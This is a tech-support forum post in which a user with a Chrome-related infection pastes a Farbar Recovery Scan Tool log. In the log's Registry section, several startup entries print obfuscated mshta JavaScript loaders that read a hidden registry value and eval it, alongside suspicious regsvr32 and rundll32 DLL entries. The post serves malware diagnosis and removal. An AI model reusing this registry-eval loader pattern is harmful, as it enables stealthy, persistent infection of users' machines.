Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

Laptop/Chrome Virus Issue [Solved]

chrome

  • This topic is locked This topic is locked

#1
xander291190

xander291190

    Member

  • Member
  • PipPip
  • 13 posts

Hi,

 

This is my first time posting to the forum, so firstly my apologies if i have posted in the wrong area. My friend recommended the forum to try and solve my problem. I have read the Malware and Spyware and have run the software, I have pasted the reports at the end. Furthermore I have screenshots available upon request showing my Task Manager and the problem described below.

 

My issue appears to be some sort of Virus/Malware/Spyware that affects my Google Chrome and system processing. It started a few days ago when i noticed my laptop running very slow and freezing constantly. I checked my task manager and noticed the CPU and Memory were almost at 100%, due to as many as 15 different processes all related to Chrome without having the browser open.

 

I'm aware Chrome functions differently with it's processes' compared to other browsers, but after expanding a few of them i noticed some of them were very strange. There were multiple 'New tab' processes, again the browser is unopened on my desktop, but the most concerning ones were named 'video-promo.org'

 

I have tried to end all the processes' but they quickly start again, I have run various programs that claim to remove and Malware or Spyware but the problem continues. The only thing that seemed to work was when I somehow managed ton uninstall Chrome, the laptop worked fine. However when Chrome was reinstalled the problem started exactly as before. 

 

I'm stuck with what to do next and any help that you guys can provide will be much appreciated.

 

Thanks in advance!

 

Reports:

 

FRST:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:31-08-2015
Ran by user (administrator) on HP (03-09-2015 08:22:52)
Running from C:\Users\user\Downloads
Loaded Profiles: user (Available Profiles: user)
Platform: Windows 8.1 Connected (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
() C:\Program Files\ATI Technologies\ATI.ACE\a4\AdaptiveSleepService.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidMonitorSvc.exe
(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSANHost.exe
(Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe
(Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAService.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(BitTorrent Inc.) C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
() C:\Users\user\AppData\Roaming\GoogleUpdate\GoogleUpdate.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
(Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAMain.exe
(Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
Failed to access process -> WerFault.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\wsqmcons.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Failed to access process -> SearchProtocolHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7535832 2014-02-13] (Realtek Semiconductor)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [704344 2015-02-05] (Alps Electric Co., Ltd.)
HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-29] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-29] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-29] (Hewlett-Packard)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-04-18] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [1045304 2013-10-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [PSUAMain] => C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAMain.exe [40184 2015-02-27] (Panda Security, S.L.)
HKLM-x32\...\Run: [**218bad7d<*>] => mshta javascript:iyQT4VY="CK3O";V67s=new%20ActiveXObject("WScript.Shell");FY0Tn0JM="2iHgm";xV2Ij2=V67s.RegRead("HKLM\\software\\Wow6432Node\\fa4c9d5698\\0d3cffd4");VZi3hnSgk9="pVE";eval(xV2Ij2);Z5fWFm (the data entry has 10 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Winlogon: [Userinit] C:\Windows\SysWOW64\userinit.exe,
HKLM\...\Policies\Explorer\Run: [1853556740] => C:\ProgramData\msbogj.exe [76288 2015-06-16] ()
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [uTorrent] => C:\Users\user\AppData\Roaming\uTorrent\uTorrent.exe [1696096 2015-08-28] (BitTorrent Inc.)
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2899136 2015-08-20] (Valve Corporation)
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [**218bad7d<*>] => mshta javascript:W9aS1KCR="UUw4";y9o8=new%20ActiveXObject("WScript.Shell");Vc5AeYFkq="MOb";q6p3jI=y9o8.RegRead("HKCU\\software\\fa4c9d5698\\0d3cffd4");KZf98Edu="zLL";eval(q6p3jI);IcaPSE6="4ifrZ3"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [**c1b2a7eb<*>] => mshta javascript:gF0Iv2HVDd="a";A8e=new%20ActiveXObject("WScript.Shell");g7SKg0Rg="IcEJFbpa";J1oi1c=A8e.RegRead("HKCU\\software\\7e31c7fb1f\\121bdb0c");w9gONqNan6="GHrQ";eval(J1oi1c);ZAiqko6="z9mBn9"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [**da02f0de<*>] => mshta javascript:fxZCP3i="kxqXBLRASQ";y4I9=new%20ActiveXObject("WScript.Shell");mA3WxwAa="o";l5rWG0=y4I9.RegRead("HKCU\\software\\7e31c7fb1f\\121bdb0c");K8L5tFFO="2tv";eval(l5rWG0);Tq2YCV1mv="hiPfYH6" (the data entry has 1 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [YbPack] => regsvr32.exe C:\Users\user\AppData\Local\YbPack\comNetengine.dll <===== ATTENTION
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [Eqtion] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\user\AppData\Local\Ufrmedia\frivolled.dll
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [GoogleUpdate] => C:\Users\user\AppData\Roaming\GoogleUpdate\GoogleUpdate.exe [62042624 2015-09-03] ()
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [FireFoxUpdServeisSystem] => C:\Users\user\AppData\Roaming\FireFoxUpdServeis\[email protected] [66560 2015-09-02] ()
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [Update] => C:\Users\user\AppData\Roaming\GoogleUpdate\GoogleUpdate.exe [62042624 2015-09-03] ()
HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\Run: [xzhw] => rundll32 "C:\Users\user\AppData\Roaming\scrrunp.dll",obtmokiq
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll No File
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0E2E738C-AA2B-43E7-AC64-518FDCB854EF}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.jp.msn.com/HPALL14/14
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.jp.msn.com/HPALL14/14
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.jp.msn.com/HPALL14/14
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.jp.msn.com/HPALL14/14
